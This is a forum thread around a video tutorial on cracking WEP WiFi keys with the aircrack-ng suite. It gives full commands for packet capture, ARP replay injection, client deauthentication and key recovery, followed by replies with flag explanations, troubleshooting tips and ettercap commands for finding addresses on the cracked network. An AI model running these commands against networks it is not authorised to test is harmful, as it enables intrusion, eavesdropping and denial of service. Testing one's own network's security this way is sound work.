Results 1 to 8 of 8

Thread: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3129452
    Download video: http://www.mediafire.com/?f17myy9vdu4fxic
    What is this?
    Yet another video on "How to crack WEP".


    How does this work?
    ARP beacon is needed (depending on the attack method), so this can be re‐injected back into the network. To get this packets the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the client).

    Once the key beacon has been captured and enough data injected/collected, it is now an offline attack either by brute force or a dictionary attack. Then its just a question of waiting then the attacker will have the key (brute forcing WEP can be less than 60 seconds!)

    From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.


    What do I need?

    > Aircrack-ng suite
    > WiFi card that supports monitor mode & injection


    Software
    Name: Aircrack-ng
    Version: 1.0-rc3
    Home Page: http://www.aircrack-ng.org/doku.php
    Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz

    Commands:
    Code:
    airmon-ng stop mon0
    airmon-ng start wlan0
    airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
    
    aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
    
    aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
    
    aircrack-ng output*.cap
    
    ifconfig wlan0 down
    iwconfig wlan0 essid g0tmi1k
    iwconfig wlan0 key 59EF19C76A
    ifconfig wlan0 up
    dhclient wlan0
    Notes:
    If you want WPA/WPA2 PSK (with a hidden SSID) - See: http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html

    Song: Mr. Oizo - Flat Beat
    Video length: 03:50
    Capture length: 07:23

    Blog Post: http://g0tmi1k.blogspot.com/2010/03/...th-client.html
    Forum Post: http://www.backtrack-linux.org/forum....html#post7957
    Last edited by g0tmi1k; 03-05-2011 at 02:51 PM.
    Have you...g0tmi1k?

  2. #2
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    1

    Default Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Awesome video, thanks. So, suppose you've cracked a WEP and DHCP is disabled and you obviously need an IP and network setting to set for static. So what then? Thanks

  3. #3
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    8

    Default Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Here's a quick reference from the aireplay-ng manpage for all the flags used in this video with aireplay-ng, so you don't have to search up and down the actual manpage to see what they mean (maybe include these in popups for future vids? ).


    Filter options:
    -b <bssid> MAC address of access point.
    -d <dmac> MAC address of destination.
    -s <smac> MAC address of source.

    Replay options:
    -a <bssid> Set Access Point MAC address.
    -c <dmac> Set destination MAC address.
    -h <smac> Set source MAC address.
    -e <essid>
    Fake Authentication attack: Set target SSID (see below). For
    SSID containing special characters, see http://www.aircrack-
    ng.org/doku.php?id=faq#how_to_use_spaces_double_quote_and _sin‐
    gle_quote_etc._in_ap_names

    Attack modes:
    -0 <count>, --deauth=<count>
    This attack sends deauthentication packets to one or more
    clients which are currently associated with a particular access
    point. Deauthenticating clients can be done for a number of rea‐
    sons: Recovering a hidden ESSID. This is an ESSID which is not
    being broadcast. Another term for this is "cloaked" or Capturing
    WPA/WPA2 handshakes by forcing clients to reauthenticate or Gen‐
    erate ARP requests (Windows clients sometimes flush their ARP
    cache when disconnected). Of course, this attack is totally
    useless if there are no associated wireless client or on fake
    authentications.

    -3, --arpreplay
    The classic ARP request replay attack is the most effective way
    to generate new initialization vectors (IVs), and works very
    reliably. The program listens for an ARP packet then retransmits
    it back to the access point. This, in turn, causes the access
    point to repeat the ARP packet with a new IV. The program
    retransmits the same ARP packet over and over. However, each ARP
    packet repeated by the access point has a new IVs. It is all
    these new IVs which allow you to determine the WEP key.
    One question: why with the --arpreplay attack do you use -b (filter option, AP) with -h (replay option, source MAC) while with --deauth you use both replay options -a and -c ? Basically, whats the difference between the filter and replay options? I see that replay sets the addresses, but how do I know when to set vs. when to filter?

  4. #4
    Just burned his ISO
    Join Date
    May 2010
    Posts
    1

    Default Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Hey great video. Im completely a newbie but I stumbled across backtrack and have been looking into how i works and want to test the strength of my Wi-Fi password. (Mainly because I'm paranoid and everytime my internet goes slow I assume someone has found a way in, sort of silly I know..but possible)

    Right now its currently a WEP and I'm not going to change to a WPA until i can crack it. I followed your steps (which were very easy by the way) but then....

    When I got to the last step where you cracked the key i got

    "Failed. Next try with 30000 IVs" instead of the WEP key any ideas why?

    I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.

    Edit:
    Sorry just a little extra information around 2:20 of the video when Im looking at the packets sent in shell 2 is zero and im not sure why, is that important? the data is increasing in shell one though.

    Update:
    I finally got my own WEP code so im going to definitely upgrade to a WPA lol because it wasnt too hard. I am curious to find out why it was failing before though. This time i let the shell one run longer after the code

    airmon-ng start wlan0

    before using

    eg. airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0

    would that have made a difference at all or is it just a big coincidence?
    Last edited by athemak; 05-12-2010 at 04:44 AM. Reason: more info and update

  5. #5
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Quote Originally Posted by overyander View Post
    Awesome video, thanks. So, suppose you've cracked a WEP and DHCP is disabled and you obviously need an IP and network setting to set for static. So what then? Thanks
    Well you can either try and guess what the IPs are (192.168.1.1, or 192.168.0.1 or 192.168.1.254 or google
    OR
    There are a lot of ways to do it. For example you can use the ettercap plugin find_ip to find a free ip and the plugin gw_discover to find the gateway.
    To find the ip:
    ettercap -T -i interface_name -P find_ip //
    To discover the gateway:
    ettercap -T -i interface_name -P gw_discover
    Thanks petabyte
    Disabled DHCP! how to find out IP - Remote Exploit Forums

    mastodongle
    Here's a quick reference from the aireplay-ng manpage for all the flags used in this video with aireplay-ng, so you don't have to search up and down the actual manpage to see what they mean (maybe include these in popups for future vids? ).
    ...
    One question: why with the --arpreplay attack do you use -b (filter option, AP) with -h (replay option, source MAC) while with --deauth you use both replay options -a and -c ? Basically, whats the difference between the filter and replay options? I see that replay sets the addresses, but how do I know when to set vs. when to filter?
    Its an idea I have thought about doing, and one day I may end up doing it! anyway...
    Trial and error? arpreplay ask for -b and -h, deauth ask for -a -c.



    Hey great video. Im completely a newbie but I stumbled across backtrack and have been looking into how i works and want to test the strength of my Wi-Fi password. (Mainly because I'm paranoid and everytime my internet goes slow I assume someone has found a way in, sort of silly I know..but possible)

    Right now its currently a WEP and I'm not going to change to a WPA until i can crack it. I followed your steps (which were very easy by the way) but then....

    When I got to the last step where you cracked the key i got

    "Failed. Next try with 30000 IVs" instead of the WEP key any ideas why?

    I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.

    Edit:
    Sorry just a little extra information around 2:20 of the video when Im looking at the packets sent in shell 2 is zero and im not sure why, is that important? the data is increasing in shell one though.

    Update:
    I finally got my own WEP code so im going to definitely upgrade to a WPA lol because it wasnt too hard. I am curious to find out why it was failing before though. This time i let the shell one run longer after the code

    airmon-ng start wlan0

    before using

    eg. airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0

    would that have made a difference at all or is it just a big coincidence?
    "Failed. Next try with 30000 IVs" instead of the WEP key any ideas why?
    Yep. You havnet got enough of the "right" packets. You just need to collect more

    I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.
    Either wait for some activity OR generate some.
    Last edited by g0tmi1k; 05-14-2010 at 07:44 AM.
    Have you...g0tmi1k?

  6. #6
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    1

    Default Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    I don't get how you deside wich bassid/station to use?

  7. #7
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Quote Originally Posted by Dandrama View Post
    I don't get how you deside wich bassid/station to use?
    g0tmi1k - is my network (so that is the ESSID).
    If you follow "g0tmi1k" across...it has "00:19:5B:E7:52:70" (as the BSSID)

    Then moving down (to the client area), you see that in the "BSSID" column, one of them is the same as the BSSID from above (00:19:5B:E7:52:70). Move across to "station" - there is the MAC address of the client (00:12:17:94:90:0D) which is connect to my network (g0tmi1k)

    This is what I'm doing at 0:24 - 0:57 in the video.
    Have you...g0tmi1k?

  8. #8
    Just burned his ISO
    Join Date
    May 2008
    Posts
    3

    Default Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    what does it mean when it says, "mon0 is on channel -1, but the AP uses channel 1"? how should i fix that? thanks in advance.

Similar Threads

  1. [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
    By g0tmi1k in forum BackTrack Videos
    Replies: 50
    Last Post: 04-08-2011, 07:35 AM
  2. Ettercap - No poisoning between client -> host
    By Dishwasher in forum Beginners Forum
    Replies: 2
    Last Post: 03-06-2010, 06:15 PM
  3. About BT4 Aircrack-ng no handshake FIX
    By Swisher in forum Beginners Forum
    Replies: 2
    Last Post: 02-25-2010, 08:12 PM
  4. BT4 and AirCrack IV generation
    By ellimistx99 in forum Beginners Forum
    Replies: 4
    Last Post: 01-24-2010, 07:40 PM
  5. aircrack-ng wpa problems ?
    By capron in forum Beginners Forum
    Replies: 5
    Last Post: 01-13-2010, 10:43 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •